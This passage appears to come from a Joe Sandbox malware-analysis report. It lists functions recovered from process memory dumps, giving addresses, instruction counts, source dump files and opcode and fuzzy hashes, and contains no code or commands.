                                                                                                                    Function 00007FFD9BBB62EF Relevance: .3, Instructions: 333COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1bb86287f08c2f8bbd3bacb2ee6608d88c852d3114e7c15825fc87d2400c9ef8
                                                                                                                    • Instruction ID: f35e4cc030051a55cc6b5914d6e73e745f23b561339b9e1cdaf2d4ce88ac50d9
                                                                                                                    • Opcode Fuzzy Hash: 1bb86287f08c2f8bbd3bacb2ee6608d88c852d3114e7c15825fc87d2400c9ef8
                                                                                                                    • Instruction Fuzzy Hash: 4BC1C07061996A8FEB2DCF48C0E05B27BA1FF45314B5545BDC84B8B6DADA38F941CB80
                                                                                                                    Function 00007FFD9BBB129F Relevance: .3, Instructions: 332COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9c7862b6ca59812916521334f40e658e46a14f565ca930094ef605dd01b2f2b7
                                                                                                                    • Instruction ID: 2ebc29de573e4856ac9f996fc19ba5270ce9f86976577cd1934e5f29596d02c4
                                                                                                                    • Opcode Fuzzy Hash: 9c7862b6ca59812916521334f40e658e46a14f565ca930094ef605dd01b2f2b7
                                                                                                                    • Instruction Fuzzy Hash: 96C1B13062955A8BEB2DCF48C4E05B637A1FF45304B5545BDC84B8B6DBDA38F942CB40
                                                                                                                    Function 00007FFD9B7E95D1 Relevance: .3, Instructions: 311COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7e3000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4835fe1df9705142ac1a0e2f8325cc0430485146a12634fd2f916fef6663c101
                                                                                                                    • Instruction ID: d317520424dbbbd938b4e824aa7d0777a72b104a1af9150f32788781a605760b
                                                                                                                    • Opcode Fuzzy Hash: 4835fe1df9705142ac1a0e2f8325cc0430485146a12634fd2f916fef6663c101
                                                                                                                    • Instruction Fuzzy Hash: A4A18F31B19A0D8FDB58EB68C4A5AB977E1FF98304B510679E01EC72A6DF34A842C741
                                                                                                                    Function 00007FFD9B7FFA38 Relevance: .3, Instructions: 306COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 808c72dc2643524c2e2d7825ca4fefe64b4ab251673d7084285d79e733cc0d14
                                                                                                                    • Instruction ID: cd442bd8911d8e929c7f5ce667d8cc5011bb25781c7dcf3c2627647e03ac24e7
                                                                                                                    • Opcode Fuzzy Hash: 808c72dc2643524c2e2d7825ca4fefe64b4ab251673d7084285d79e733cc0d14
                                                                                                                    • Instruction Fuzzy Hash: D181D831B19E0D4FEFA8DB5CD4656B977E1EF98750B11017AD04ED32A1DE21AD428780
                                                                                                                    Function 00007FFD9BBB0B8A Relevance: .3, Instructions: 305COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 02f7c2632e8461bfe0aaddd1449abaf7ce105a99505b0db45c5133d4e2cf8a48
                                                                                                                    • Instruction ID: f4920cae5d77d5ac16e4ae46b8c641dbbc4e5436e103fefae6269bb5ee001980
                                                                                                                    • Opcode Fuzzy Hash: 02f7c2632e8461bfe0aaddd1449abaf7ce105a99505b0db45c5133d4e2cf8a48
                                                                                                                    • Instruction Fuzzy Hash: FEB11630A0DA9A8FD759DB69C0A06B5BBA0FF05304F8541B9C44EC7AD7DB38B951CB90
                                                                                                                    Function 00007FFD9BBB3547 Relevance: .3, Instructions: 303COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 79aeae59f83917e04680ed7b92c1e46dca78335cedadf65e0d5d4ebb91d6b7e0
                                                                                                                    • Instruction ID: 408a2c5e1b865c4133460b8de7f7e0b6f30766e5d78192716367907bf3e3ebd1
                                                                                                                    • Opcode Fuzzy Hash: 79aeae59f83917e04680ed7b92c1e46dca78335cedadf65e0d5d4ebb91d6b7e0
                                                                                                                    • Instruction Fuzzy Hash: 2021D992F0E2AB86F73556A654318FE56607F5032CF6A017BD45D850E2EC0C6A855B82
                                                                                                                    Function 00007FFD9BBB31F9 Relevance: .3, Instructions: 302COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 05001d2b7a8eae2288ae1c087f25ef91eea23cf7053ca8f1a4b84d7cc93f5a1e
                                                                                                                    • Instruction ID: d6409fade27b9433b1f234bd3dd34d18a459d5c1a06351dab6d0fa6101e24c5c
                                                                                                                    • Opcode Fuzzy Hash: 05001d2b7a8eae2288ae1c087f25ef91eea23cf7053ca8f1a4b84d7cc93f5a1e
                                                                                                                    • Instruction Fuzzy Hash: 91916032B0E95D4FE778DA5888665B737D0FF45324B0502BBD09EC75F2DE18AA068B81
                                                                                                                    Function 00007FFD9B7F317D Relevance: .3, Instructions: 287COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: efba8261a117a846389572257a8b66d560700f9a1643481863aafadafc271dc1
                                                                                                                    • Instruction ID: bcef14ab845b677ee12860fa9f7f343ce09b7af21984eadb9dfa97ff33ad34ca
                                                                                                                    • Opcode Fuzzy Hash: efba8261a117a846389572257a8b66d560700f9a1643481863aafadafc271dc1
                                                                                                                    • Instruction Fuzzy Hash: 8291F331B1DA4E4FEB98EA6884766B977D2EF94300F0642BAD40DC72E7DD28AD4543C1
                                                                                                                    Function 00007FFD9BBB5BDA Relevance: .3, Instructions: 286COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f951d6313f43cb046c6efa15c15300d29116ff254a14e97b98c6e0e094586609
                                                                                                                    • Instruction ID: f14cf01d3bf24783d022bb977ac9f99f321fb79fc5b8f5e99078d95d5341222a
                                                                                                                    • Opcode Fuzzy Hash: f951d6313f43cb046c6efa15c15300d29116ff254a14e97b98c6e0e094586609
                                                                                                                    • Instruction Fuzzy Hash: C0A1253060DA9A8FE759DB68C0B06B5BBA1FF45304F4541B9C04EC7AD7CB28B951CB81
                                                                                                                    Function 00007FFD9BBB000A Relevance: .3, Instructions: 284COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 015c50fc70a4edb134b3312e1052ea814a0b5b27f351612efbedb2c095e8f17f
                                                                                                                    • Instruction ID: 7d4734054c9d8a4ea493f1da8ebe13dc737dc49a0f30bc1c8709589f3677ea7c
                                                                                                                    • Opcode Fuzzy Hash: 015c50fc70a4edb134b3312e1052ea814a0b5b27f351612efbedb2c095e8f17f
                                                                                                                    • Instruction Fuzzy Hash: 4B915A31A0EB994FE73A8B6898750767BE0FF42704B5605BFD0CAC71E3DD2869058B51
                                                                                                                    Function 00007FFD9B7FE81A Relevance: .3, Instructions: 276COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 81ff5db54470b9c2abcf55a64447905182e510e97950656eeacd4716218f5d32
                                                                                                                    • Instruction ID: c56a9c489dc8ca7c8564ca4ea93985f93da7322e4b0b63d739a788daeeebc361
                                                                                                                    • Opcode Fuzzy Hash: 81ff5db54470b9c2abcf55a64447905182e510e97950656eeacd4716218f5d32
                                                                                                                    • Instruction Fuzzy Hash: 4E91B671B0DB4D8FDB98DF6884646AD7BE2FF9C300F05027AE049E32A2DE246901C795
                                                                                                                    Function 00007FFD9BBB50B6 Relevance: .3, Instructions: 261COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aaf3de8836b6a78ba6d357ddb2662dfc3ba504bd408fb6d90de059691ac76f2f
                                                                                                                    • Instruction ID: 31f7968d336944acd88f553bd45da065adacffb2a0fec571674280f9a6b55d1c
                                                                                                                    • Opcode Fuzzy Hash: aaf3de8836b6a78ba6d357ddb2662dfc3ba504bd408fb6d90de059691ac76f2f
                                                                                                                    • Instruction Fuzzy Hash: 98814631A0EB5A4FE7749B58947117A77E0FF85314B16057ED48EC32E2DE28BA028B43
                                                                                                                    Function 00007FFD9B8012F1 Relevance: .2, Instructions: 243COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2ba7ca840b54d303363fc621a1f39484860ffa2888e921e2c3d9b96327e14223
                                                                                                                    • Instruction ID: c6052773813e076e7414c582c12864d4f6a6406e1f2c35d80963cd91b5387e72
                                                                                                                    • Opcode Fuzzy Hash: 2ba7ca840b54d303363fc621a1f39484860ffa2888e921e2c3d9b96327e14223
                                                                                                                    • Instruction Fuzzy Hash: B7816171F1994E8BEB54EBD8C8A5AFCB7B2FF98350F510179E048D32A6DE286841C741
                                                                                                                    Function 00007FFD9B8003E9 Relevance: .2, Instructions: 242COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fced5f6a1d630aeb0966c4d15bf01cc38be7ae0618cf882fbc0b784236d1c07d
                                                                                                                    • Instruction ID: 84aced5395b7026e21be4c5694ba0d88bbe3a29030f24e1e1d75afa193834760
                                                                                                                    • Opcode Fuzzy Hash: fced5f6a1d630aeb0966c4d15bf01cc38be7ae0618cf882fbc0b784236d1c07d
                                                                                                                    • Instruction Fuzzy Hash: 5F61E331A1DE0C8FDF64DF98D465AE9B7E1EFA9740F11026AD049D7262DE21E841CB80
                                                                                                                    Function 00007FFD9B7FFC38 Relevance: .2, Instructions: 224COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1c35e96a80a330fa0723f62b293bdae68cc39dc2570b0ffc8f2e247f93d492a5
                                                                                                                    • Instruction ID: 1486367a59300988fc13f249065a71e04f35b10b0252ba11c003575b038b5f78
                                                                                                                    • Opcode Fuzzy Hash: 1c35e96a80a330fa0723f62b293bdae68cc39dc2570b0ffc8f2e247f93d492a5
                                                                                                                    • Instruction Fuzzy Hash: 58614C62B1EF8E0FE7A5DA6C58B55B97BD2FF94700B0506BAD40CC72F6ED14A8058381
                                                                                                                    Function 00007FFD9B8007A8 Relevance: .2, Instructions: 224COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f00fda15880ade08c1ae84612d5df0b97e151e9ee4ea42e39a949daddd128986
                                                                                                                    • Instruction ID: 281f7c45d3e2e8c3e70215cdaed8d2a44e3f0db560cb8f60b67234706a8a5166
                                                                                                                    • Opcode Fuzzy Hash: f00fda15880ade08c1ae84612d5df0b97e151e9ee4ea42e39a949daddd128986
                                                                                                                    • Instruction Fuzzy Hash: C651C531B2DE0E4FEB68EB5884509B5B3E1FF987507150679D09EC7696DE24FC428780
                                                                                                                    Function 00007FFD9BBB3DBB Relevance: .2, Instructions: 221COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1773fd7c238a76f9736dd1b30f0705dd4d6c23b51298f62b895f9aab1bbf8f95
                                                                                                                    • Instruction ID: fc17096efc0cad8234ff18809eece627d5511f1156a9ab0278d0fde9d49dd093
                                                                                                                    • Opcode Fuzzy Hash: 1773fd7c238a76f9736dd1b30f0705dd4d6c23b51298f62b895f9aab1bbf8f95
                                                                                                                    • Instruction Fuzzy Hash: 3B71B030A1D55E8EEBA9DBA884656BDBBB0FF49304F5105BBD00ED71E1DE3869418B10
                                                                                                                    Function 00007FFD9B807388 Relevance: .2, Instructions: 212COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b24b21e390026c6cdd36e998027e5df4b86ae0e6f92b39450f9a979fca7b04f6
                                                                                                                    • Instruction ID: a4dec0758ab90ab62700f305446dc0facba3f889c1f58f5c2821e1422df022da
                                                                                                                    • Opcode Fuzzy Hash: b24b21e390026c6cdd36e998027e5df4b86ae0e6f92b39450f9a979fca7b04f6
                                                                                                                    • Instruction Fuzzy Hash: AC51A031B1DA0D4FEB98EB6C88A56B973D2FF9C350B1501B9E44DC32E6DE24AC428741
                                                                                                                    Function 00007FFD9B800081 Relevance: .2, Instructions: 193COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 520ddd5ac196cb4272182b2081b56d6fcf8edb253a064520460a1ec6222c872d
                                                                                                                    • Instruction ID: 67baeff513a5ae3ae2916c38ae221c366462589b5920ffda5e845c55611d4bc0
                                                                                                                    • Opcode Fuzzy Hash: 520ddd5ac196cb4272182b2081b56d6fcf8edb253a064520460a1ec6222c872d
                                                                                                                    • Instruction Fuzzy Hash: 8A510621B2DE8E4FEBA9DB689474AB977D1FF9834070505FBD09DC72E6DD24A9018340
                                                                                                                    Function 00007FFD9BBB5BF1 Relevance: .2, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 81f035f68b2d38cc98daa8ff4c94624574d2aea962e8ef2d9cf97e083765f8b9
                                                                                                                    • Instruction ID: fe6bce31f85df35c04b4a331aa86a46fef04e38d60aecd7fb075907f24364f04
                                                                                                                    • Opcode Fuzzy Hash: 81f035f68b2d38cc98daa8ff4c94624574d2aea962e8ef2d9cf97e083765f8b9
                                                                                                                    • Instruction Fuzzy Hash: AB51B170B1995A9BE798EB58C0B4AB6B391FF58304F508279C00EC7AD6DB34F9518F81
                                                                                                                    Function 00007FFD9B7FFB20 Relevance: .1, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dd735f527b62286efeeef5ba05c87ebfc338a7917d7b5c594695f9e1f76e71b5
                                                                                                                    • Instruction ID: 9f9b076cae96418edba93589e04264e51f094ec658eb14a6fd6ff94c8e5438fe
                                                                                                                    • Opcode Fuzzy Hash: dd735f527b62286efeeef5ba05c87ebfc338a7917d7b5c594695f9e1f76e71b5
                                                                                                                    • Instruction Fuzzy Hash: 93313831B29D4E4FD7A8DB6C84606B673D2FF98354B5642B6D44CCB1AADA24F902C780
                                                                                                                    Function 00007FFD9BBB7937 Relevance: .1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 130e2d0998aee95ef77a697f16202d8a78c430b5a35013a831658aaafec33e03
                                                                                                                    • Instruction ID: a4a50381264635dfb62ffaf0e09fc1f70ae922efd4fd519ebc97a25d21b3527f
                                                                                                                    • Opcode Fuzzy Hash: 130e2d0998aee95ef77a697f16202d8a78c430b5a35013a831658aaafec33e03
                                                                                                                    • Instruction Fuzzy Hash: BD41913270C9588FDF98EF2CC4A6DB5B3E1FBA931470505AAD04AC3292DE31E945CB81
                                                                                                                    Function 00007FFD9BBB28E7 Relevance: .1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 45194bde3aee99a2c99952eb07f75a6934f53001258151de7d35ffaf83a66fea
                                                                                                                    • Instruction ID: 4d2a2389992d7590f125bc3cbe8d8bef3ec9166f6ad87ff920875d6280093aa3
                                                                                                                    • Opcode Fuzzy Hash: 45194bde3aee99a2c99952eb07f75a6934f53001258151de7d35ffaf83a66fea
                                                                                                                    • Instruction Fuzzy Hash: 7441603260C95D8FDF98EB5CD4A5EB977E1FBA931070401B9D04EC72A2DE21E845CB91
                                                                                                                    Function 00007FFD9BBB79E1 Relevance: .1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3439844515980c6544207fd38439b4c72d377604a4d477abcb5de9d5f0200713
                                                                                                                    • Instruction ID: be357bfe85e9a7b1dee2f8b1dc2ade819e3e78f1e9b09c6ca1b7ada835d0e87c
                                                                                                                    • Opcode Fuzzy Hash: 3439844515980c6544207fd38439b4c72d377604a4d477abcb5de9d5f0200713
                                                                                                                    • Instruction Fuzzy Hash: 91317F3260C9588FDB98EB18C465DB473E1FBA931470505AED04AC72A2DE31E940CB81
                                                                                                                    Function 00007FFD9BBB2991 Relevance: .1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d6ba870768ed7e41fc1223591b4b7da34f9efb5eb983a6789b1eb77d1a627e2
                                                                                                                    • Instruction ID: e403f78ef09bb9baad6cc9b3ec4a29a4e6e246f74d03532cd9fe4e2a882af4d6
                                                                                                                    • Opcode Fuzzy Hash: 3d6ba870768ed7e41fc1223591b4b7da34f9efb5eb983a6789b1eb77d1a627e2
                                                                                                                    • Instruction Fuzzy Hash: 33317E3160CA498FDF98EF1CC4A5EB877E1FBA931070405A9D05EC72A2DE25E845CB91
                                                                                                                    Function 00007FFD9BBB797B Relevance: .1, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d3ea7e6ab1bbd61e4d891d4ee7067d00cee4a3b06bb86bd156467f35bbbb11f7
                                                                                                                    • Instruction ID: 3ed8497ac9e81a38df313fe58cb21dfb0fede822cb8771027de2aa3b7ac48fdf
                                                                                                                    • Opcode Fuzzy Hash: d3ea7e6ab1bbd61e4d891d4ee7067d00cee4a3b06bb86bd156467f35bbbb11f7
                                                                                                                    • Instruction Fuzzy Hash: 6D31913270C9498FDF98EF18C465DB5B3E1FBA931470505AED04AC72A2DE31E981CB81
                                                                                                                    Function 00007FFD9BBB017D Relevance: .1, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
